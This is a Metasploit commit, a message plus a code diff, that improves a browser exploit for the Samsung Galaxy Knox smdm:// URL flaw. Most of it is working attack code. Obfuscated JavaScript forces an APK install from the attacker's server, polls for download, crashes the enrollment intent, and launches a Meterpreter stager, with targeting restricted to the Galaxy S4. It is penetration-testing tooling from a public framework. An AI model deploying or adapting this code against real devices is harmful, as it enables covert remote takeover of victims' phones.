Some URL fixes from @jduck and exploit ideas from Andre Moulu.

jvennix-r7 · jvennix-r7 · commit 7a62b71839dc · 2014-11-15T21:33:16.000-06:00
The exploit works with the URLs fixed, installs the APK, but hangs at the Installing...
screen and never actually launches. We tried opening the APK in a setTimeout() intent
URI, but the previously launched intent seemed unresponsive. Andre had the bright
idea of re-opening the previously launched intent with invalid args, crashing it and
allow us to launch the payload.
diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb
@@ -49,8 +49,6 @@ def add_javascript_interface_exploit_js(arch)
 
         // libraryData contains the bytes for a native shared object built via NDK
         // which will load the "stage", which in this case is our android meterpreter stager.
-        // LibraryData is loaded via ajax later, because we have to access javascript in
-        // order to detect what arch we are running.
         var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
 
         // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
diff --git a/modules/exploits/android/browser/samsung_knox_smdm_url.rb b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -18,9 +18,21 @@ class Metasploit3 < Msf::Exploit::Remote
     :arch       => ARCH_ARMLE,
     :javascript => true,
     :rank       => ExcellentRanking,
-    :vuln_test  => VULN_CHECK_JS
+
+    # For BAP we only allow whitelisted devices/firmwares
+    # that we have tested:
+    # - Samsung S4
+    :vuln_test  => %Q|
+      is_vuln = navigator.userAgent.match(
+        /SAMSUNG GT-I9505/
+      );
+    |
   )
 
+  # Hash that maps payload ID -> (0|1) if an HTTP request has
+  # been made to download a payload of that ID
+  attr_reader :served_payloads
+
   def initialize(info = {})
     super(update_info(info,
       'Name'                => 'Samsung Galaxy Knox Android Browser RCE',
@@ -48,9 +60,7 @@ def initialize(info = {})
       'DefaultTarget'       => 0,
       'BrowserRequirements' => {
         :source     => 'script',
-        :os_name    => OperatingSystems::Match::ANDROID,
-        :vuln_test  => VULN_CHECK_JS,
-        :vuln_test_error => 'The client is not vulnerable.'
+        :os_name    => OperatingSystems::Match::ANDROID
       }
     ))
 
@@ -60,15 +70,33 @@ def initialize(info = {})
       ])
     ], self.class)
 
-
     deregister_options('JsObfuscate')
   end
 
+  def exploit
+    @served_payloads = Hash.new(0)
+    super
+  end
+
+  def apk_bytes
+    payload.encoded
+  end
+
   def on_request_uri(cli, req)
-    if req.uri =~ /\.apk$/
-      is_head = req.method.upcase == 'HEAD'
-      print_status "Serving #{is_head ? 'metadata' : 'payload'}..."
-      send_response(cli, is_head ? '' : payload.encoded, magic_headers)
+    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
+      if req.method.upcase == 'HEAD'
+        print_status "Serving metadata..."
+        send_response(cli, '', magic_headers)
+      else
+        print_status "Serving payload '#{$1}'..."
+        @served_payloads[$1] = 1
+        send_response(cli, apk_bytes, magic_headers)
+      end
+    elsif req.uri =~ /_poll/
+      puts "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
+      send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
+    elsif req.uri =~ /launch$/
+      send_response_html(cli, launch_html)
     else
       super
     end
@@ -81,28 +109,62 @@ def on_request_exploit(cli, req, browser)
   end
 
   def magic_headers
-    { 'Content-Length' => payload.encoded.length,
-      'ETag' => Digest::MD5.hexdigest(payload.encoded),
+    { 'Content-Length' => apk_bytes.length,
+      'ETag' => Digest::MD5.hexdigest(apk_bytes),
       'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
   end
 
   def generate_html
     %Q|
       <!doctype html>
-      <html><body><script>
+      <html><body>
+      <script>
       #{exploit_js}
       </script></body></html>
     |
   end
 
   def exploit_js
+    payload_id = rand_word
+
     js_obfuscate %Q|
 
-      setInterval(function(){
+      function poll() {
+        var xhr = new XMLHttpRequest();
+        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
+        xhr.onreadystatechange = function(){
+          if (xhr.readyState == 4) {
+            if (xhr.responseText == '1') {
+              setTimeout(killEnrollment, 100);
+            } else {
+              setTimeout(poll, 1000);
+              setTimeout(enroll,0);
+              setTimeout(enroll,500);
+            }
+          }
+        };
+        xhr.onerror = function(){ setTimeout(poll, 1000); };
+        xhr.send();
+      }
+
+      function enroll() {
         var loc = window.location.href.replace(/[/.]$/g, '');
         window.location = 'smdm://#{rand_word}?update_url='+
-          encodeURIComponent(loc)+'.apk';
-      }, 500);
+          encodeURIComponent(loc)+'/#{payload_id}.apk';
+      }
+
+      function killEnrollment() {
+        window.location = "intent://#{rand_word}?program="+
+          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
+        setTimeout(launchApp, 300);
+      }
+
+      function launchApp() {
+        window.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
+      }
+
+      enroll();
+      setTimeout(poll,600);
 
     |
   end
